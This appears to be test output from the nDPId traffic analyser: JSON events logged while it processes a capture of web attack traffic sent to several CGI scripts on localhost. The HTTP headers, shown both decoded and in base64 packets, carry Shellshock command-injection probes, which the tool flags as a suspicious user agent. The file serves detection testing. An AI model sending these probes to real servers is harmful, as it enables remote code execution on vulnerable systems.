-01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/contact.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7440000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7440000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 